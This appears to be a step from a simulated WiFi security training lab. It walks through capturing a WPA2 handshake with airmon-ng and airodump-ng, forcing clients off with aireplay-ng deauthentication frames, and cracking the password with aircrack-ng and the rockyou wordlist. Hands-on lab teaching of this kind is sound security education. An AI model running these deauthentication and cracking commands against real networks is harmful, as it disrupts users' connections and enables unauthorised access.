Select "Airsuite Recon and Key Discovery" from the menu. Allow up to 30 seconds to initialize the network. 

![[Pasted image 20250125093129.png]]

Two attacker panes will appear in your terminal window. 

![[Pasted image 20250121124517.png]]

Within one of these panes, run the following command to put the a-wlan0 interface into monitor mode.

```
airmon-ng start a-wlan0
```

If the following prompt appears, input "y" and hit enter. 

![[Pasted image 20250121124620.png]]

Successful initialization will appear as pictured below. 

![[Pasted image 20250121124702.png]]

Check the new monitor interface. 

```
ifconfig | grep flags
```

As pictured below, a-wlan0mon should now be present. 

![[Pasted image 20250121124744.png]]

Next, run airodump-ng to identify the the BSSID for WPA2_NETWORK.

```
airodump-ng a-wlan0mon
```

The following should appear. Note the BSSID for the WPA2_NETWORK.

![[Pasted image 20250121124907.png]]

After noting the BSSID for the WPA2_NETWORK, stop the process using \[CTRL + c]. Next, run aircrack-ng to begin generating a capture file. 

```
airodump-ng a-wlan0mon -c 6 --bssid <WPA2_BSSID> -w wificap1
```

Running the above command will provide the following output. 

![[Pasted image 20250121125142.png]]

Leave this console running while performing the next steps.

Take note of one of the station macs under the STATION column in the console output (see screenshot below). 

![[Pasted image 20250121125325.png]]

Run the following command in the other panel terminal. Replace \<WPA2_Network BSSID> and \<STATION MAC> with the WPA2_Network BSSID and any station mac respectively.

```
aireplay-ng a-wlan0mon -0 100 -a <WPA2_Network BSSID> -c <STATION MAC>
```

After running this command, your terminal should be spammed with the messages pictured below. 

![[Pasted image 20250121125603.png]]

At this point, your window should appear as the following screenshot.

![[Pasted image 20250121125720.png]]

Wait until the first attacker terminal display the text highlighted in red below. Let both terminals run until the first attacker terminal displays the text shown in red below. 

![[Pasted image 20250121125840.png]]

In either attacker terminal, use \[CTRL + C] to stop any running processes. Run the following command. 

```
aircrack-ng -w /Wifi-Forge/Framework/materials/rockyou.txt ./wificap1-01.cap 
```

It should not take long for aircrack to get the password.

![[Pasted image 20250121130139.png]]

In either of the terminal panes, type main_menu to return to the main menu and onto the next lab. 

NEXT LAB: [[5. Cracking WPA Handshakes with Aircrack-ng]]